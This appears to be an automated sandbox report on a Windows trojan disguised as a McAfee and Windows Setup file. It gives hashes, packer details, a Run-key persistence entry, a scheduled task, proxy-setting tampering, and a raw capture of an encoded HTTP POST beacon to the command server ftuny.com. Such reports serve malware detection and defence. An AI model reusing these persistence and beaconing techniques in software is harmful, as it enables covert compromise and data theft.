Analysis Date2014-08-27 00:00:36
MD50b5d9a9f1ee75b1de5982ae77f479131
SHA1eaad8bad8c7dadf5fc4a8c15569b7d6f3dc174c4

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: a5194be073c874f0137f106ea073d2bd sha1: c87c2e81e1bfbbb7c8eb14c42f78023c6aa5590d size: 52736
Section.data md5: 81fc7746d2385b19fdf278f28b1c8004 sha1: d040cc6455bbeb07e85217bae55079f1fde85d8f size: 1024
Section.DATA0 md5: c99a74c555371a433d121f551d6c6398 sha1: 605db3fdbaff4ba13729371ad0c4fbab3889378e size: 2048
Section.DATA7 md5: d448d5524e86c72703646c1beb3910a2 sha1: 80b0b0e6fa3f6e8cc95a7976b100ed46959a8143 size: 125952
Section.DATA3 md5: 571bfec41fc4a428b85a9e484839bd14 sha1: 2f681f46fc929f909433e823f90d248569e3a36b size: 15360
Section.DATA2 md5: 805bcef44f1d364718d87ba3559c2030 sha1: 1226aa806ae8d95f7d1402960b542cc1137d7e98 size: 3584
Section.rsrc md5: 16470a139587ebc9e4aa8838e4578aec sha1: 7c7430115e1d085b5bb49b6a4c9d84df9632d0c4 size: 1536
Timestamp2009-02-03 18:12:52
VersionLegalCopyright: Copyright © McAfee Inc. Unlimited Edition
InternalName: UnlimitedEdition.exe
FileVersion: 6.0.6001.17727
CompanyName: Windows (R) Codename Longhorn DDK provider
ProductName: Unlimited Edition Version Ex-2011 by McAfee Inc.
ProductVersion: 6.0.6001.17727
FileDescription: Windows Setup API
OriginalFilename: UnlimitedEdition.exe
PackerFSG v1.10 (Eng) -> dulek/xt
PEhash544fa33d4ec2dae21a7dc65f5de3cb8f894fe494
IMPhash15cfb2a1a83d68b79bc4c44cbdf0cc10

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\JP595IR86O ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\JP595IR86O\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNSftuny.com

Network Details:

DNSalibaba.com
Type: A
205.204.96.36
DNStumblr.com
Type: A
66.6.41.30
DNStumblr.com
Type: A
66.6.42.30
DNSftuny.com
Type: A
208.73.210.219
DNSftuny.com
Type: A
208.73.211.174
DNSftuny.com
Type: A
208.73.211.233
DNSftuny.com
Type: A
208.73.211.235
DNSftuny.com
Type: A
208.73.211.246
DNSphreeway.com
Type: A
HTTP POSThttp://ftuny.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 208.73.210.219:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   70553375 4f487037 65526348 5069596f   pU3uOHp7eRcHPiYo
0x00000150 (00336)   39394d4d 55756a67 55573462 76544964   99MMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c6f 73583149   /Golwxlm9kLosX1I
0x00000230 (00560)   365a5136 6e333664 2f6e346b 72315677   6ZQ6n36d/n4kr1Vw
0x00000240 (00576)   6271516a 2f413d3d                     bqQj/A==


Strings
H..8q.
b
.\.
.qR.
].
D.
f.
.....5u...5fu..V..|..
040904B0
0d7T
1DAe
6.0.6001.17727
84lN
8nzS
B8Q7
BrO5
CompanyName
Copyright 
D1kU
DgQc8
DTQRi
eB1yy
eMdT
fBPS
FileDescription
FileVersion
I3X9
InternalName
Kxqm
Lall
LegalCopyright
 McAfee Inc. Unlimited Edition
MxPA
OriginalFilename
P8L0
pRnz
ProductName
ProductVersion
PsF1
StringFileInfo
tOw5
Translation
tUiW
UnlimitedEdition.exe
Unlimited Edition Version Ex-2011 by McAfee Inc.
VarFileInfo
VS_VERSION_INFO
Windows (R) Codename Longhorn DDK provider
Windows Setup API
0e4QXi
0GqPtf
0OKOPlM
0)SkHe
0Umgi6
#0YuB$
16ZLPe
1qdeWu:?
2EK2&4
2fmIKNz
2!j{e<
2mnqFq
+2v{RBY
_.37{g
~37os:
3cBv78
3cUKGx
3diXHe
3maj,x
3P_XMUt
3qDPPu4G
40l7vfJ[*g2C
4<^gwSV
4`?	*H
4//]j!
@4q~\1
4SE1[f
53]Q=C
5g6Ylxx
5rf(2//4
5tGH]EQ
5uWK0Y
5xfw]v$
5Y%dPE
60g+g>}(
6HTHrE226Y
(6}_yb
\73`,_
7%7'!23!
78=r5k
7dDyKIA
7eTp2eG
7FE)EU
7hxkTrY
}7kMc_
7	L's2
7q?]A><u
8QiPOy9ZmY
8yOt06vIjd1D
8Z5we1
9}rB+5E
9vvtsC
_a1_euy
	absL)TS
_acmdln
ActivateKeyboardLayout
ADVAPI32.dll
Adz*IA
aGQywq%oM7
A$nS`s
AoiwwMw
aSJJ6Yq
AT_^\IV
~b4eXR
!BaG[zq
BDBmI8
beCxTWNbd
bEIa0V
BiNYvS
B_sfSUP
BUBLJ9
_:bxw'
bxW$7i
c]\/B.
cDQXMH
ChooseColorA
;|[CHq
C"IqwXF>
CLSIDFromString
CoDisconnectObject
CoGetContextToken
comctl32.dll
comdlg32.dll
COMDLG32.dll
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemFree
CoUninitialize
CoUnmarshalInterface
CQfG0yu
_CqOZt
CreateBindCtx
CreateFontIndirectA
CreatePalette
CreateStreamOnHGlobal
cscHKC
`c~U-CV
cyQOlkGV
D27}km
)D%6^qy
`.data
.DATA0
.DATA2
@.DATA3
.DATA7
DE[3IN[pG
dmvHetqbgC
dOMgQW3$
<!Dv~87
\Dv#.k
.E9v*OR
E!ATG1
&)>Eb 
eCtR][
#eDFO\
edxYMn
Egchkwx
e=K23*
e kW!	0q
;eLkA##
eM0lUd7B
E m^5^
e_MniK5
 eN7taG4
eNGXgX
e[o:98
EP<Cq!
e&[=vf
ExitProcess
ExitThread
EyLkS5
f]0>uN
FBKa349
FGc'E[P0
FG}e;Aw
FindTextA
F}_?jJI
Fmc%Y_aEwU
fnG|~dj9v7
#fq|}Ex
ft3BbVW
Ft__$q
FT&zD_
fxE2B9
'*$g_/
g1Sv1Wh
G5Q=@	
g_5u@Y)g
>*g6jd
G6|"JZ
GbhHVF
gdi32.dll
GDI32.dll
GetActiveWindow
GetBitmapBits
GetCommandLineW
GetDIBColorTable
GetFileAttributesA
GetFileTitleA
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetLastError
GetModuleHandleA
GetOpenFileNameA
GetPaletteEntries
GetProcAddress
GetSaveFileNameA
GetVersionExA
ggIoqB
GiUZsu
GlobalAlloc
GlpgY0H
Gn\qBD
g)OS+Y
gUh_fEQ
,%!@h]
H3O'Sx
@h$6 S
heCmXyj
he'xBx
=hN0_9\
hRBO6>
hugmGVq
hU!:QD
?hUyOU
HWHw4k
H|,w;&R
{	@}i"
I3sg&V
iEwr5dG
igF`AT
iL41uL8
ImageList_Create
ImageList_Destroy
ImageList_Draw
ImageList_DrawEx
i)PAO5
IqfMfWse2
iRI8p7erE
IsBadHugeReadPtr
IsBadReadPtr
IVerFindFileA
IxC2vB
IxCfSR
Iy#"\(
j1jAjYjGR
j4j}j[P
j7jBjo
j!a wdv>0
jbjlj1
jBjpj/
J^cF2)rE
jcjCj~
jCj<j-
jdjIjp
jdjvjlj
JFi9A+oV
jij7jYjp
j{j1j[W
j$jIjK
j@j)j_j
jjy7vOpbp
jKjejT
jkjrjD
.JOh,\
jOj,jl
JprF{;gG
jqj=jb
jQjzjJ
jSjojUW
jTj9j4
jUj?jJ
jxj.jv
J	Ye^Fu
j`'}ygOk
jYj2j$V
jYjYjp
JZQ\*w 
k0L^~[
K3Mx3l
k7XJD6
kCyM&Y2AT7
kernel32.dll
KERNEL32.dll
KERNEL32.DLL
kGGHg0
KJsROW
KP59Iu0
KPG%kA9
kqR;G\
KrnBFw
Ksqwpi
 k#s/*y
KuS/"h\
kx5yU4t
 KXYHw
L>3K5e&O
l7uVGB5w
lbPLuq
ldnpetDj
LFo@A.
^%LG<|
Lg/&u^
lHVwyJud
LoadLibraryExA
:lP\X?
Lv[we_
M61;F.X<
m7K ym
MCBbq6
|MDNSP
memcpy
MkParseDisplayName
~mOR{&
m_qZ"w
mSTo0bm
msvcrt.dll
MSVCRT.dll
M)U5{CAIz
~ $N{2
;N_6E[s
N^\7Sk
n/Eg29
NeUw&(
?Nl~q}tR1
N;q7fr
{NQXa(
n[ybg<_%
n'yn3/
(O*(*\
o3VuuNw
O51EYIEb
OArR8wi
_}|O@B
O&D<?P
oD('WX
}O)< E
}OEq"%
OfMJ4YT
OIDu6:
ole32.dll
OLE32.dll
OLEAUT32.dll
OleCreateStaticFromData
OleRegGetUserType
OleRun
`oMMu#
OUvLHX
)}#'^p
P84HNx
PathFileExistsA
PathGetCharTypeA
PathIsContentTypeA
PathIsDirectoryA
Pg-t("5
PJEzyV
Pj!j>Q
Pk1Ww6
pKLSW9
pOONtO
PpMDenODe6m
PropVariantClear
pSNbQ8
p~WRZ{
Q3$HQ>',
qAwH6[
QbVsKf
q;C\S{
QEw\S[
Qj:jyQ
Qjrj,P
`!q>/s
qs[uQg
QU3t^_
Qx\m7wE
{r1N O
r2]VHq
)r57/Jv
R6SIx(
ra2N5xFn
RegisterTypeLib
RegLoadKeyA
RegOpenKeyExA
ReleaseStgMedium
REX:0gS
RgCsJo
RjYj|V
r=}m;(%0
}R#OO\GU
rowWCAp[
rpcrt4.dll
r{R(e^ $<
@.rsrc
rsv5[kux
.~r)Yq
RzSQtf
/rZxHZ
@s:4]7vg
S[5gN3EcL"
SafeArrayGetElement
SafeArrayGetUBound
sbaDQqLB
sc aX&[
SetTextColor
SHELL32.dll
SHGetFolderPathA
shlwapi.dll
SHQueryInfoKeyA
SHQueryValueExA
SHSetValueA
sJ9KJx
s])&}m
^SMdvV
SNfbOdbntHj
sprintf
SR^kA=-
SrYl5ND1U
StringFromIID
SUTNKt
s;uXC{U["
's&#]Vuw
s.wkM5a
t0mEn3
T_4Q:|
~{t6[u}Z_
tB%wOd
#t(/CtNu&
t:Eqcf
TEVQYN
TgDoLv
!This program cannot be run in DOS mode.
;TJfYH
tJILff
tLN1UZ
`{T-lu
Ty+0Sy
U3tuyEF
U9Up83A
	UGMD+
uGyjAC
u:m%tl[
UnhookWindowsHookEx
unSUA 
user32.dll
uS_LR_
_Us""Y
u[wwnr
ux{=33
>UXcu^
UXew15
}v[&[}
v8|$_1
vc]QLZI
vE{lgG5
VerFindFileA
VERSION.dll
VERSION.DLL
V@gqS'Q
VirtualAlloc
Vj8j3W
Vj8jYV
Vj:j{Q
v"_?K&
VKmN_6CX3
v<;ms\L
VO}JGa.
VQ#hDH
vtmoV5a
vu$Ff_
VUhsN_
vuSV 1N
vv5_Z|
VVGaV0v
Vww5Ba
VZjQj4XP
w48JGK
`w`8sz
Wb*S+Y
wcscspn
w(!dvg
w}GKn_X
wIETGrT
Wj	jBV
Wjoj_V
Wjtj	P
WnQE'G
wpRFjg
wr(~'Y
ws7mE95
:"W#t>"
\[	X, 
X03HWS
xBe",)p>
X{BrE-
&{,xG Z
X'qa-2r
xUiyyO
x%>=xb{
xxVq0PA
Y\%0Kb
,Y8u S'
=yF$KD}
yg/oJYVLg
yHj/:D
+yHkwA
YKGhEH
|YL[gX_P
{YLXXb
YrjVKTJ
 -Y]Sd
ysHr\<
yUD,EsCku5F|K
YwFiPt
yxYbmO
z00x2nDIw
z/#a~gH'
zFb'#.q
Zp[D\D
)Zs:/p
zuODPH
Z*V}`G
ZXETSU
\Z(.xT